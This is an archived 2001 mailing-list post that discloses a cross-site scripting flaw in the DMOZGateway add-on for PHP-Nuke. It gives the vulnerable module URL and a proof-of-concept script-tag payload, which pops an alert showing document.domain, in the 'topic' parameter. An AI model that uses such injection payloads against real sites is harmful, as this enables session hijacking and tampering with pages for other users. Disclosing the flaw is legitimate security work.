Vulnerability Development mailing list archives
CSS in DMOZGateway ( php-nuke )
From: frog frog <leseulfrog () hotmail com>
Date: 16 Dec 2001 10:48:25 -0000
New hole in an phpnuke addon. The concerned addon is DMOZGateway. He allows to search on the web via the dmoz.org site. The addon's url is th following one : /modules.php? op=modload&name=DMOZGateway&file=index The cross site scripting hole is : /modules.php? op=modload&name=DMOZGateway&file=index&topic =<sc*ript>alert(document.domain) </sc*ript><sc*ript>alert(/test/)</sc*ript> (without the '*') frog-m@n
Current thread:
- CSS in DMOZGateway ( php-nuke ) frog frog (Dec 16)